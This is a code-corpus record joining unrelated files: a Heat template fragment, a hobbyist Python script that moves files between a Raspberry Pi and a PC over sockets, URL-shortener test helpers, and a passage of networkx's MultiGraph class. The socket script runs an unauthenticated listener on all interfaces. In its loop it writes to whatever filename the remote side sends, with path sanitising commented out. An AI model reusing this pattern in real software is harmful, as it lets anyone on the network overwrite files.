self.merge_sections = [self.PARAMETERS, self.CONDITIONS]
def get_condition_definitions(self):
return self[self.CONDITIONS]
def validate_resource_definition(self, name, data):
super(HOTemplate20161014, self).validate_resource_definition(
name, data)
self.validate_resource_key_type(
self.RES_EXTERNAL_ID,
(six.string_types, function.Function),
'string', self._RESOURCE_KEYS, name, data)
self.validate_resource_key_type(
self.RES_CONDITION,
(six.string_types, bool),
'string or boolean', self._RESOURCE_KEYS, name, data)
def has_condition_section(self, snippet):
if snippet and self.CONDITION in snippet:
return True
return False
| 37.09127
| 79
| 0.632074
|
e1f9a90857398f9a0fdeaca2d04fa69ad9807a40
| 9,273
|
py
|
Python
|
sccoresystems/sccspython/sccsLNLPcToPi.py
|
ninekorn/sccsVRStreamingHeadsetScriptsNProjectParts-WIP
|
76bf728e961133ce16ad89bef7fcfe030d163847
|
[
"MIT"
] | null | null | null |
sccoresystems/sccspython/sccsLNLPcToPi.py
|
ninekorn/sccsVRStreamingHeadsetScriptsNProjectParts-WIP
|
76bf728e961133ce16ad89bef7fcfe030d163847
|
[
"MIT"
] | null | null | null |
sccoresystems/sccspython/sccsLNLPcToPi.py
|
ninekorn/sccsVRStreamingHeadsetScriptsNProjectParts-WIP
|
76bf728e961133ce16ad89bef7fcfe030d163847
|
[
"MIT"
] | null | null | null |
#made by ninekorn
import socket
import os
import time
import sys
import struct
#https://stackoverflow.com/questions/1271320/resetting-generator-object-in-python
#import more_itertools as mit
#import tqdm
# device's IP address
PC_HOST = "192.168.0.107"
PC_PORT = 5001
# device's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5000
# receive 4096 bytes each time
BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
clientfilename = "sccsmsgPiToPc.txt"
# get the file size
clientfilesize = os.path.getsize(clientfilename)
# create the server socket
# TCP socket
#s = socket.socket()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to our local address
s.bind((SERVER_HOST, SERVER_PORT))
# enabling our server to accept connections
# 5 here is the number of unaccepted connections that
# the system will allow before refusing new connections
s.listen(5)
print("Listening " + str(SERVER_HOST) + " " + str(SERVER_PORT)) #f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}"
# accept connection if there is any
client_socket, address = s.accept()
# if below code is executed, that means the sender is connected
print(str(address) + " is connected" ) #f"[+] {address} is connected."
# receive the file infos
# receive using client socket, not server socket
received = client_socket.recv(BUFFER_SIZE).decode()
#filename = received
#filesize = 0
#filename, filesize = received.split(SEPARATOR)
# remove absolute path if there is
filename = os.path.basename(received)
# convert to integer
filesize = 0#int(filesize)
somecounter = 0
somecountermax = 1;
# start receiving the file from the socket
# and writing to the file stream
#f"Receiving {filename}"
#progress = tqdm.tqdm(range(filesize), "Receiving " + str(filename), unit="B", unit_scale=True, unit_divisor=1024,mininterval=0,miniters=1,smoothing=1)
someswtc = 0
somefinalcounter = 0;
f = open(r'\\.\pipe\sccsmscpcTopi', 'r+b', 0)
i = 1
screenrowwidth = 8294400
somestring = ""
for x in range(screenrowwidth):
somestring = somestring + ' '
someitergenresetcounter = 0
someitergenresetcountermax = 0
def generator(n):
i = 0
while i > n:
yield i
#i += 1
#y = mit.seekable(generator())
y = generator(-1)
if __name__ == "__main__":
for x in y:
#section to read the buffer
s = somestring.encode('ascii') #'Message[{0}]'.format(i).encode('ascii')
i += 1
f.write(struct.pack('I', len(s)) + s) # Write str length and str
f.seek(0) # EDIT: This is also necessary
print('Wrote:', s)
n = struct.unpack('I', f.read(4))[0] # Read str length
s = f.read(n).decode('ascii') # Read str
f.seek(0) # Important!!!
print('Read:', s)
#section to read the buffer
if someswtc == -1:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to our local address
s.bind((SERVER_HOST, SERVER_PORT))
# enabling our server to accept connections
# 5 here is the number of unaccepted connections that
# the system will allow before refusing new connections
s.listen(5)
print("Listening " + str(SERVER_HOST) + " " + str(SERVER_PORT)) #f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}"
try:
# accept connection if there is any
client_socket, address = s.accept()
# if below code is executed, that means the sender is connected
print(str(address) + " is connected" ) #f"[+ {address} is connected."
somesocketreceiverswtc = 1
# receive the file infos
# receive using client socket, not server socket
received = client_socket.recv(BUFFER_SIZE).decode()
#filename, filesize = received.split(SEPARATOR)
filename = received
filesize = 0
#filename, filesize = received.split(SEPARATOR)
# remove absolute path if there is
#filename = os.path.basename(filename)
# convert to integer
#filesize = int(filesize)
somecounter = 0
somecountermax = 1;
# start receiving the file from the socket
# and writing to the file stream
#f"Receiving {filename}"
#progress = tqdm.tqdm(range(filesize), "Receiving " + str(filename), unit="B", unit_scale=True, unit_divisor=1024,mininterval=0,miniters=1,smoothing=1)
someswtc = 0
except Exception as ex:
print(ex)
if someswtc == 0:
somefilesizeswtc = 0
try:
filename,junk = filename.split(">>>>")
somefilesizeswtc = 1
except:
# convert to integer
#filesize = int(filesize)
somefilesizeswtc = 0
if somefilesizeswtc == 1:
#with open(filename, "wb") as f:
textfile = open(filename, "w")
textfile.write("#" + junk)
textfile.close()
# close the client socket
client_socket.close()
# close the server socket
s.close()
else:
with open(filename, "wb") as f:
while True:
# read 1024 bytes from the socket (receive)
bytes_read = client_socket.recv(BUFFER_SIZE)
if not bytes_read:
# nothing is received
# file transmitting is done
break
# write to the file the bytes we just received
f.write(bytes_read)
# update the progress bar
#progress.update(len(bytes_read))
# close the client socket
client_socket.close()
# close the server socket
s.close()
someswtc = 1
if someswtc == 1:
print("creating socket")
# create the server socket
# TCP socket
#s = socket.socket()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#s.setblocking(1)
someswtc = 2
if someswtc == 2:
print("ready to receive another file. advising server.")
# bind the socket to our local address
#s.bind((PC_HOST, PC_PORT))
try:
print("[+] Connecting.")
s.connect((PC_HOST, PC_PORT))
print("[+] Connected.")
someswtc = 3
except Exception as ex:
print(ex)
#s.send(("PiToPc-received-" + str(filename)).encode())
#someswtc = 0
if someswtc == 3:
#print("wait for the programmer ninekorn to insert code here.")
print("sending confirmation receipt file to server with request for another file or not.")
#s.send(("PiToPc-received-" + str(filename)).encode())
#s.setblocking(1)
#s.send(f"{clientfilename}{SEPARATOR}{clientfilesize}".encode())
s.send("PiToPcReceipt".encode())
#s.close()
#s = socket.socket()
#s.bind()
#s.listen(5)
# start sending the file
#progress = tqdm.tqdm(range(clientfilesize), clientfilename, unit="B", unit_scale=True, unit_divisor=1024,mininterval=0,miniters=1,smoothing=1)
with open(clientfilename, "rb") as f:
while True:
# read the bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
# file transmitting is done
break
# we use sendall to assure transimission in
# busy networks
s.sendall(bytes_read)
# update the progress bar
#progress.update(len(bytes_read))
# close the socket
s.close()
someswtc = -1
if someitergenresetcounter >= someitergenresetcountermax:
#y.seek(0)
#print(x)
someitergenresetcounter = 0
someitergenresetcounter += 1
time.sleep(0)
| 33.597826
| 167
| 0.527877
|
3a6b7de39e35d1dda0abf34f3b31a837cfa98021
| 2,698
|
py
|
Python
|
tests/utils.py
|
mawillcockson/mw_url_shortener
|
312cc958dceaeaeecc5bfcf1a958b8cb092a3568
|
[
"MIT"
] | null | null | null |
tests/utils.py
|
mawillcockson/mw_url_shortener
|
312cc958dceaeaeecc5bfcf1a958b8cb092a3568
|
[
"MIT"
] | null | null | null |
tests/utils.py
|
mawillcockson/mw_url_shortener
|
312cc958dceaeaeecc5bfcf1a958b8cb092a3568
|
[
"MIT"
] | null | null | null |
"""
utilities used by the tests
generally, these are utilities that can't work as pytest fixtures, since pytest fixtures provide the same value all throught a single test function, regardless of scope
"""
import itertools
from random import randint
from typing import Iterable
import faker # faker fixture required for tests
from mw_url_shortener.database import redirect, user
from mw_url_shortener.types import HashedPassword, Key, Uri, Username
from mw_url_shortener.utils import random_username as rand_username
from mw_url_shortener.utils import (
unsafe_random_hashed_password as random_hashed_password,
)
from mw_url_shortener.utils import unsafe_random_string as random_string
def random_username() -> Username:
"creates an example username"
return rand_username(randint(1, 10))
def random_user() -> user.Model:
"creates a fictitious user that doesn't exist in the database"
return user.Model(
username=random_username(),
hashed_password=random_hashed_password(),
)
fake = faker.Faker()
fake.add_provider(faker.providers.misc)
fake.add_provider(faker.providers.internet)
def random_json() -> str:
"uses faker fixture to generate random json"
return str(fake.json())
def random_uri() -> Uri:
"uses faker to generate random URIs"
return Uri(fake.uri())
def random_key() -> Key:
"""
uses faker to generate unique random keys
from:
https://faker.readthedocs.io/en/stable/providers/faker.providers.misc.html#faker.providers.misc.Provider.password
"""
# NOTE:BUG Doesn't go below 3 characters in length
# Need to make a new_redirect_key function
return Key(
fake.unique.password(
length=randint(3, 10),
special_chars=False,
digits=True,
upper_case=True,
lower_case=True,
)
)
def random_redirect() -> redirect.Model:
"uses faker to generate a random redirect model"
return redirect.Model(key=random_key(), uri=random_uri())
def all_combinations(characters: str, length: int) -> Iterable[str]:
"""
gives an iterator that produces all the combinations of characters from a
set for a particular length
"""
if not (isinstance(characters, str) and len(characters) > 0):
raise TypeError("characters must be a str of 1 or more characters")
if not (isinstance(length, int) and length > 0):
raise TypeError("length must be a positive int greater than 0")
def combo_gen() -> Iterable[str]:
"inner generator"
for three_str_tuple in itertools.product(set(characters), repeat=length):
yield "".join(three_str_tuple)
return combo_gen()
| 29.977778
| 168
| 0.710897
|
1779a6167b06b4503d67c586f397788737f8f699
| 40,241
|
py
|
Python
|
networkx/classes/multigraph.py
|
MaxBromberg/networkx
|
e4d1483f241e9a56fbda247592710b659d29bce5
|
[
"BSD-3-Clause"
] | 1
|
2020-11-20T10:14:14.000Z
|
2020-11-20T10:14:14.000Z
|
networkx/classes/multigraph.py
|
MaxBromberg/networkx
|
e4d1483f241e9a56fbda247592710b659d29bce5
|
[
"BSD-3-Clause"
] | 4
|
2016-04-22T14:50:02.000Z
|
2020-11-20T09:30:44.000Z
|
networkx/classes/multigraph.py
|
MaxBromberg/networkx
|
e4d1483f241e9a56fbda247592710b659d29bce5
|
[
"BSD-3-Clause"
] | 2
|
2020-12-21T11:41:13.000Z
|
2021-01-08T17:09:21.000Z
|
"""Base class for MultiGraph."""
from copy import deepcopy
import networkx as nx
from networkx.classes.graph import Graph
from networkx.classes.coreviews import MultiAdjacencyView
from networkx.classes.reportviews import MultiEdgeView, MultiDegreeView
from networkx import NetworkXError
class MultiGraph(Graph):
"""
An undirected graph class that can store multiedges.
Multiedges are multiple edges between two nodes. Each edge
can hold optional data or attributes.
A MultiGraph holds undirected edges. Self loops are allowed.
Nodes can be arbitrary (hashable) Python objects with optional
key/value attributes. By convention `None` is not used as a node.
Edges are represented as links between nodes with optional
key/value attributes.
Parameters
----------
incoming_graph_data : input graph (optional, default: None)
Data to initialize graph. If None (default) an empty
graph is created. The data can be any format that is supported
by the to_networkx_graph() function, currently including edge list,
dict of dicts, dict of lists, NetworkX graph, NumPy matrix
or 2d ndarray, SciPy sparse matrix, or PyGraphviz graph.
attr : keyword arguments, optional (default= no attributes)
Attributes to add to graph as key=value pairs.
See Also
--------
Graph
DiGraph
MultiDiGraph
OrderedMultiGraph
Examples
--------
Create an empty graph structure (a "null graph") with no nodes and
no edges.
>>> G = nx.MultiGraph()
G can be grown in several ways.
**Nodes:**
Add one node at a time:
>>> G.add_node(1)
Add the nodes from any container (a list, dict, set or
even the lines from a file or the nodes from another graph).
>>> G.add_nodes_from([2, 3])
>>> G.add_nodes_from(range(100, 110))
>>> H = nx.path_graph(10)
>>> G.add_nodes_from(H)
In addition to strings and integers any hashable Python object
(except None) can represent a node, e.g. a customized node object,
or even another Graph.
>>> G.add_node(H)
**Edges:**
G can also be grown by adding edges.
Add one edge,
>>> key = G.add_edge(1, 2)
a list of edges,
>>> keys = G.add_edges_from([(1, 2), (1, 3)])
or a collection of edges,
>>> keys = G.add_edges_from(H.edges)
If some edges connect nodes not yet in the graph, the nodes
are added automatically. If an edge already exists, an additional
edge is created and stored using a key to identify the edge.
By default the key is the lowest unused integer.
>>> keys = G.add_edges_from([(4, 5, {"route": 28}), (4, 5, {"route": 37})])
>>> G[4]
AdjacencyView({3: {0: {}}, 5: {0: {}, 1: {'route': 28}, 2: {'route': 37}}})
**Attributes:**
Each graph, node, and edge can hold key/value attribute pairs
in an associated attribute dictionary (the keys must be hashable).
By default these are empty, but can be added or changed using
add_edge, add_node or direct manipulation of the attribute
dictionaries named graph, node and edge respectively.
>>> G = nx.MultiGraph(day="Friday")
>>> G.graph
{'day': 'Friday'}
Add node attributes using add_node(), add_nodes_from() or G.nodes
>>> G.add_node(1, time="5pm")
>>> G.add_nodes_from([3], time="2pm")
>>> G.nodes[1]
{'time': '5pm'}
>>> G.nodes[1]["room"] = 714
>>> del G.nodes[1]["room"] # remove attribute
>>> list(G.nodes(data=True))
[(1, {'time': '5pm'}), (3, {'time': '2pm'})]
Add edge attributes using add_edge(), add_edges_from(), subscript
notation, or G.edges.
>>> key = G.add_edge(1, 2, weight=4.7)
>>> keys = G.add_edges_from([(3, 4), (4, 5)], color="red")
>>> keys = G.add_edges_from([(1, 2, {"color": "blue"}), (2, 3, {"weight": 8})])
>>> G[1][2][0]["weight"] = 4.7
>>> G.edges[1, 2, 0]["weight"] = 4
Warning: we protect the graph data structure by making `G.edges[1, 2]` a
read-only dict-like structure. However, you can assign to attributes
in e.g. `G.edges[1, 2]`. Thus, use 2 sets of brackets to add/change
data attributes: `G.edges[1, 2]['weight'] = 4`
(For multigraphs: `MG.edges[u, v, key][name] = value`).
**Shortcuts:**
Many common graph features allow python syntax to speed reporting.
>>> 1 in G # check if node in graph
True
>>> [n for n in G if n < 3] # iterate through nodes
[1, 2]
>>> len(G) # number of nodes in graph
5
>>> G[1] # adjacency dict-like view keyed by neighbor to edge attributes
AdjacencyView({2: {0: {'weight': 4}, 1: {'color': 'blue'}}})
Often the best way to traverse all edges of a graph is via the neighbors.
The neighbors are reported as an adjacency-dict `G.adj` or `G.adjacency()`.
>>> for n, nbrsdict in G.adjacency():
... for nbr, keydict in nbrsdict.items():
... for key, eattr in keydict.items():
... if "weight" in eattr:
... # Do something useful with the edges
... pass
But the edges() method is often more convenient:
>>> for u, v, keys, weight in G.edges(data="weight", keys=True):
... if weight is not None:
... # Do something useful with the edges
... pass
**Reporting:**
Simple graph information is obtained using methods and object-attributes.
Reporting usually provides views instead of containers to reduce memory
usage. The views update as the graph is updated similarly to dict-views.
The objects `nodes, `edges` and `adj` provide access to data attributes
via lookup (e.g. `nodes[n], `edges[u, v]`, `adj[u][v]`) and iteration
(e.g. `nodes.items()`, `nodes.data('color')`,
`nodes.data('color', default='blue')` and similarly for `edges`)
Views exist for `nodes`, `edges`, `neighbors()`/`adj` and `degree`.
For details on these and other miscellaneous methods, see below.
**Subclasses (Advanced):**
The MultiGraph class uses a dict-of-dict-of-dict-of-dict data structure.
The outer dict (node_dict) holds adjacency information keyed by node.
The next dict (adjlist_dict) represents the adjacency information and holds
edge_key dicts keyed by neighbor. The edge_key dict holds each edge_attr
dict keyed by edge key. The inner dict (edge_attr_dict) represents
the edge data and holds edge attribute values keyed by attribute names.
Each of these four dicts in the dict-of-dict-of-dict-of-dict
structure can be replaced by a user defined dict-like object.
In general, the dict-like features should be maintained but
extra features can be added. To replace one of the dicts create
a new graph class by changing the class(!) variable holding the
factory for that dict-like structure. The variable names are
node_dict_factory, node_attr_dict_factory, adjlist_inner_dict_factory,
adjlist_outer_dict_factory, edge_key_dict_factory, edge_attr_dict_factory
and graph_attr_dict_factory.
node_dict_factory : function, (default: dict)
Factory function to be used to create the dict containing node
attributes, keyed by node id.
It should require no arguments and return a dict-like object
node_attr_dict_factory: function, (default: dict)
Factory function to be used to create the node attribute
dict which holds attribute values keyed by attribute name.
It should require no arguments and return a dict-like object
adjlist_outer_dict_factory : function, (default: dict)
Factory function to be used to create the outer-most dict
in the data structure that holds adjacency info keyed by node.
It should require no arguments and return a dict-like object.
adjlist_inner_dict_factory : function, (default: dict)
Factory function to be used to create the adjacency list
dict which holds multiedge key dicts keyed by neighbor.
It should require no arguments and return a dict-like object.
edge_key_dict_factory : function, (default: dict)
Factory function to be used to create the edge key dict
which holds edge data keyed by edge key.
It should require no arguments and return a dict-like object.
edge_attr_dict_factory : function, (default: dict)
Factory function to be used to create the edge attribute
dict which holds attribute values keyed by attribute name.
It should require no arguments and return a dict-like object.
graph_attr_dict_factory : function, (default: dict)
Factory function to be used to create the graph attribute
dict which holds attribute values keyed by attribute name.
It should require no arguments and return a dict-like object.
Typically, if your extension doesn't impact the data structure all
methods will inherited without issue except: `to_directed/to_undirected`.
By default these methods create a DiGraph/Graph class and you probably
want them to create your extension of a DiGraph/Graph. To facilitate
this we define two class variables that you can set in your subclass.
to_directed_class : callable, (default: DiGraph or MultiDiGraph)
Class to create a new graph structure in the `to_directed` method.
If `None`, a NetworkX class (DiGraph or MultiDiGraph) is used.
to_undirected_class : callable, (default: Graph or MultiGraph)
Class to create a new graph structure in the `to_undirected` method.
If `None`, a NetworkX class (Graph or MultiGraph) is used.
Please see :mod:`~networkx.classes.ordered` for examples of
creating graph subclasses by overwriting the base class `dict` with
a dictionary-like object.
"""
# node_dict_factory = dict # already assigned in Graph
# adjlist_outer_dict_factory = dict
# adjlist_inner_dict_factory = dict
edge_key_dict_factory = dict
# edge_attr_dict_factory = dict
def to_directed_class(self):
"""Returns the class to use for empty directed copies.
If you subclass the base classes, use this to designate
what directed class to use for `to_directed()` copies.
"""
return nx.MultiDiGraph
def to_undirected_class(self):
"""Returns the class to use for empty undirected copies.
If you subclass the base classes, use this to designate
what directed class to use for `to_directed()` copies.
"""
return MultiGraph
def __init__(self, incoming_graph_data=None, **attr):
"""Initialize a graph with edges, name, or graph attributes.
Parameters
----------
incoming_graph_data : input graph
Data to initialize graph. If incoming_graph_data=None (default)
an empty graph is created. The data can be an edge list, or any
NetworkX graph object. If the corresponding optional Python
packages are installed the data can also be a NumPy matrix
or 2d ndarray, a SciPy sparse matrix, or a PyGraphviz graph.
attr : keyword arguments, optional (default= no attributes)
Attributes to add to graph as key=value pairs.
See Also
--------
convert
Examples
--------
>>> G = nx.Graph() # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> G = nx.Graph(name="my graph")
>>> e = [(1, 2), (2, 3), (3, 4)] # list of edges
>>> G = nx.Graph(e)
Arbitrary graph attribute pairs (key=value) may be assigned
>>> G = nx.Graph(e, day="Friday")
>>> G.graph
{'day': 'Friday'}
"""
self.edge_key_dict_factory = self.edge_key_dict_factory
Graph.__init__(self, incoming_graph_data, **attr)
@property
def adj(self):
"""Graph adjacency object holding the neighbors of each node.
This object is a read-only dict-like structure with node keys
and neighbor-dict values. The neighbor-dict is keyed by neighbor
to the edgekey-data-dict. So `G.adj[3][2][0]['color'] = 'blue'` sets
the color of the edge `(3, 2, 0)` to `"blue"`.
Iterating over G.adj behaves like a dict. Useful idioms include
`for nbr, nbrdict in G.adj[n].items():`.
The neighbor information is also provided by subscripting the graph.
So `for nbr, foovalue in G[node].data('foo', default=1):` works.
For directed graphs, `G.adj` holds outgoing (successor) info.
"""
return MultiAdjacencyView(self._adj)
def new_edge_key(self, u, v):
"""Returns an unused key for edges between nodes `u` and `v`.
The nodes `u` and `v` do not need to be already in the graph.
Notes
-----
In the standard MultiGraph class the new key is the number of existing
edges between `u` and `v` (increased if necessary to ensure unused).
The first edge will have key 0, then 1, etc. If an edge is removed
further new_edge_keys may not be in this order.
Parameters
----------
u, v : nodes
Returns
-------
key : int
"""
try:
keydict = self._adj[u][v]
except KeyError:
return 0
key = len(keydict)
while key in keydict:
key += 1
return key
def add_edge(self, u_for_edge, v_for_edge, key=None, **attr):
"""Add an edge between u and v.
The nodes u and v will be automatically added if they are
not already in the graph.
Edge attributes can be specified with keywords or by directly
accessing the edge's attribute dictionary. See examples below.
Parameters
----------
u_for_edge, v_for_edge : nodes
Nodes can be, for example, strings or numbers.
Nodes must be hashable (and not None) Python objects.
key : hashable identifier, optional (default=lowest unused integer)
Used to distinguish multiedges between a pair of nodes.
attr : keyword arguments, optional
Edge data (or labels or objects) can be assigned using
keyword arguments.
Returns
-------
The edge key assigned to the edge.
See Also
--------
add_edges_from : add a collection of edges
Notes
-----
To replace/update edge data, use the optional key argument
to identify a unique edge. Otherwise a new edge will be created.
NetworkX algorithms designed for weighted graphs cannot use
multigraphs directly because it is not clear how to handle
multiedge weights. Convert to Graph using edge attribute
'weight' to enable weighted graph algorithms.
Default keys are generated using the method `new_edge_key()`.
This method can be overridden by subclassing the base class and
providing a custom `new_edge_key()` method.
Examples
--------
The following all add the edge e=(1, 2) to graph G:
>>> G = nx.MultiGraph()
>>> e = (1, 2)
>>> ekey = G.add_edge(1, 2) # explicit two-node form
>>> G.add_edge(*e) # single edge as tuple of two nodes
1
>>> G.add_edges_from([(1, 2)]) # add edges from iterable container
[2]
Associate data to edges using keywords:
>>> ekey = G.add_edge(1, 2, weight=3)
>>> ekey = G.add_edge(1, 2, key=0, weight=4) # update data for key=0
>>> ekey = G.add_edge(1, 3, weight=7, capacity=15, length=342.7)
For non-string attribute keys, use subscript notation.
>>> ekey = G.add_edge(1, 2)
>>> G[1][2][0].update({0: 5})
>>> G.edges[1, 2, 0].update({0: 5})
"""
u, v = u_for_edge, v_for_edge
# add nodes
if u not in self._adj:
self._adj[u] = self.adjlist_inner_dict_factory()
self._node[u] = self.node_attr_dict_factory()
if v not in self._adj:
self._adj[v] = self.adjlist_inner_dict_factory()
self._node[v] = self.node_attr_dict_factory()
if key is None:
key = self.new_edge_key(u, v)
if v in self._adj[u]:
keydict = self._adj[u][v]
datadict = keydict.get(key, self.edge_attr_dict_factory())
datadict.update(attr)
keydict[key] = datadict
else:
# selfloops work this way without special treatment
datadict = self.edge_attr_dict_factory()
datadict.update(attr)
keydict = self.edge_key_dict_factory()
keydict[key] = datadict
self._adj[u][v] = keydict
self._adj[v][u] = keydict
return key
def add_edges_from(self, ebunch_to_add, **attr):
"""Add all the edges in ebunch_to_add.
Parameters
----------
ebunch_to_add : container of edges
Each edge given in the container will be added to the
graph. The edges can be:
- 2-tuples (u, v) or
- 3-tuples (u, v, d) for an edge data dict d, or
- 3-tuples (u, v, k) for not iterable key k, or
- 4-tuples (u, v, k, d) for an edge with data and key k
attr : keyword arguments, optional
Edge data (or labels or objects) can be assigned using
keyword arguments.
Returns
-------
A list of edge keys assigned to the edges in `ebunch`.
See Also
--------
add_edge : add a single edge
add_weighted_edges_from : convenient way to add weighted edges
Notes
-----
Adding the same edge twice has no effect but any edge data
will be updated when each duplicate edge is added.
Edge attributes specified in an ebunch take precedence over
attributes specified via keyword arguments.
Default keys are generated using the method ``new_edge_key()``.
This method can be overridden by subclassing the base class and
providing a custom ``new_edge_key()`` method.
Examples
--------
>>> G = nx.Graph() # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> G.add_edges_from([(0, 1), (1, 2)]) # using a list of edge tuples
>>> e = zip(range(0, 3), range(1, 4))
>>> G.add_edges_from(e) # Add the path graph 0-1-2-3
Associate data to edges
>>> G.add_edges_from([(1, 2), (2, 3)], weight=3)
>>> G.add_edges_from([(3, 4), (1, 4)], label="WN2898")
"""
keylist = []
for e in ebunch_to_add:
ne = len(e)
if ne == 4:
u, v, key, dd = e
elif ne == 3:
u, v, dd = e
key = None
elif ne == 2:
u, v = e
dd = {}
key = None
else:
msg = f"Edge tuple {e} must be a 2-tuple, 3-tuple or 4-tuple."
raise NetworkXError(msg)
ddd = {}
ddd.update(attr)
try:
ddd.update(dd)
except (TypeError, ValueError):
if ne != 3:
raise
key = dd # ne == 3 with 3rd value not dict, must be a key
key = self.add_edge(u, v, key)
self[u][v][key].update(ddd)
keylist.append(key)
return keylist
def remove_edge(self, u, v, key=None):
"""Remove an edge between u and v.
Parameters
----------
u, v : nodes
Remove an edge between nodes u and v.
key : hashable identifier, optional (default=None)
Used to distinguish multiple edges between a pair of nodes.
If None remove a single (arbitrary) edge between u and v.
Raises
------
NetworkXError
If there is not an edge between u and v, or
if there is no edge with the specified key.
See Also
--------
remove_edges_from : remove a collection of edges
Examples
--------
>>> G = nx.MultiGraph()
>>> nx.add_path(G, [0, 1, 2, 3])
>>> G.remove_edge(0, 1)
>>> e = (1, 2)
>>> G.remove_edge(*e) # unpacks e from an edge tuple
For multiple edges
>>> G = nx.MultiGraph() # or MultiDiGraph, etc
>>> G.add_edges_from([(1, 2), (1, 2), (1, 2)]) # key_list returned
[0, 1, 2]
>>> G.remove_edge(1, 2) # remove a single (arbitrary) edge
For edges with keys
>>> G = nx.MultiGraph() # or MultiDiGraph, etc
>>> G.add_edge(1, 2, key="first")
'first'
>>> G.add_edge(1, 2, key="second")
'second'
>>> G.remove_edge(1, 2, key="second")
"""
try:
d = self._adj[u][v]
except KeyError as e:
raise NetworkXError(f"The edge {u}-{v} is not in the graph.") from e
# remove the edge with specified data
if key is None:
d.popitem()
else:
try:
del d[key]
except KeyError as e:
msg = f"The edge {u}-{v} with key {key} is not in the graph."
raise NetworkXError(msg) from e
if len(d) == 0:
# remove the key entries if last edge
del self._adj[u][v]
if u != v: # check for selfloop
del self._adj[v][u]
def remove_edges_from(self, ebunch):
"""Remove all edges specified in ebunch.
Parameters
----------
ebunch: list or container of edge tuples
Each edge given in the list or container will be removed
from the graph. The edges can be:
- 2-tuples (u, v) All edges between u and v are removed.
- 3-tuples (u, v, key) The edge identified by key is removed.
- 4-tuples (u, v, key, data) where data is ignored.
See Also
--------
remove_edge : remove a single edge
Notes
-----
Will fail silently if an edge in ebunch is not in the graph.
Examples
--------
>>> G = nx.path_graph(4) # or DiGraph, MultiGraph, MultiDiGraph, etc
>>> ebunch = [(1, 2), (2, 3)]
>>> G.remove_edges_from(ebunch)
Removing multiple copies of edges
>>> G = nx.MultiGraph()
>>> keys = G.add_edges_from([(1, 2), (1, 2), (1, 2)])
>>> G.remove_edges_from([(1, 2), (1, 2)])
>>> list(G.edges())
[(1, 2)]
>>> G.remove_edges_from([(1, 2), (1, 2)]) # silently ignore extra copy
>>> list(G.edges) # now empty graph
[]
"""
for e in ebunch:
try:
self.remove_edge(*e[:3])
except NetworkXError:
pass
def has_edge(self, u, v, key=None):
"""Returns True if the graph has an edge between nodes u and v.
This is the same as `v in G[u] or key in G[u][v]`
without KeyError exceptions.
Parameters
----------
u, v : nodes
Nodes can be, for example, strings or numbers.
key : hashable identifier, optional (default=None)
If specified return True only if the edge with
key is found.
Returns
-------
edge_ind : bool
True if edge is in the graph, False otherwise.
Examples
--------
Can be called either using two nodes u, v, an edge tuple (u, v),
or an edge tuple (u, v, key).
>>> G = nx.MultiGraph() # or MultiDiGraph
>>> nx.add_path(G, [0, 1, 2, 3])
>>> G.has_edge(0, 1) # using two nodes
True
>>> e = (0, 1)
>>> G.has_edge(*e) # e is a 2-tuple (u, v)
True
>>> G.add_edge(0, 1, key="a")
'a'
>>> G.has_edge(0, 1, key="a") # specify key
True
>>> e = (0, 1, "a")
>>> G.has_edge(*e) # e is a 3-tuple (u, v, 'a')
True
The following syntax are equivalent:
>>> G.has_edge(0, 1)
True
>>> 1 in G[0] # though this gives :exc:`KeyError` if 0 not in G
True
"""
try:
if key is None:
return v in self._adj[u]
else:
return key in self._adj[u][v]
except KeyError:
return False
@property
def edges(self):
"""Returns an iterator over the edges.
edges(self, nbunch=None, data=False, keys=False, default=None)
The EdgeView provides set-like operations on the edge-tuples
as well as edge attribute lookup. When called, it also provides
an EdgeDataView object which allows control of access to edge
attributes (but does not provide set-like operations).
Hence, `G.edges[u, v]['color']` provides the value of the color
attribute for edge `(u, v)` while
`for (u, v, c) in G.edges(data='color', default='red'):`
iterates through all the edges yielding the color attribute.
Edges are returned as tuples with optional data and keys
in the order (node, neighbor, key, data).
Parameters
----------
nbunch : single node, container, or all nodes (default= all nodes)
The view will only report edges incident to these nodes.
data : string or bool, optional (default=False)
The edge attribute returned in 3-tuple (u, v, ddict[data]).
If True, return edge attribute dict in 3-tuple (u, v, ddict).
If False, return 2-tuple (u, v).
keys : bool, optional (default=False)
If True, return edge keys with each edge.
default : value, optional (default=None)
Value used for edges that don't have the requested attribute.
Only relevant if data is not True or False.
Returns
-------
edges : MultiEdgeView
A view of edge attributes, usually it iterates over (u, v)
(u, v, k) or (u, v, k, d) tuples of edges, but can also be
used for attribute lookup as `edges[u, v, k]['foo']`.
Notes
-----
Nodes in nbunch that are not in the graph will be (quietly) ignored.
For directed graphs this returns the out-edges.
Examples
--------
>>> G = nx.MultiGraph() # or MultiDiGraph
>>> nx.add_path(G, [0, 1, 2])
>>> key = G.add_edge(2, 3, weight=5)
>>> [e for e in G.edges()]
[(0, 1), (1, 2), (2, 3)]
>>> G.edges.data() # default data is {} (empty dict)
MultiEdgeDataView([(0, 1, {}), (1, 2, {}), (2, 3, {'weight': 5})])
>>> G.edges.data("weight", default=1)
MultiEdgeDataView([(0, 1, 1), (1, 2, 1), (2, 3, 5)])
>>> G.edges(keys=True) # default keys are integers
MultiEdgeView([(0, 1, 0), (1, 2, 0), (2, 3, 0)])
>>> G.edges.data(keys=True)
MultiEdgeDataView([(0, 1, 0, {}), (1, 2, 0, {}), (2, 3, 0, {'weight': 5})])
>>> G.edges.data("weight", default=1, keys=True)
MultiEdgeDataView([(0, 1, 0, 1), (1, 2, 0, 1), (2, 3, 0, 5)])
>>> G.edges([0, 3])
MultiEdgeDataView([(0, 1), (3, 2)])
>>> G.edges(0)
MultiEdgeDataView([(0, 1)])
"""
return MultiEdgeView(self)
def get_edge_data(self, u, v, key=None, default=None):
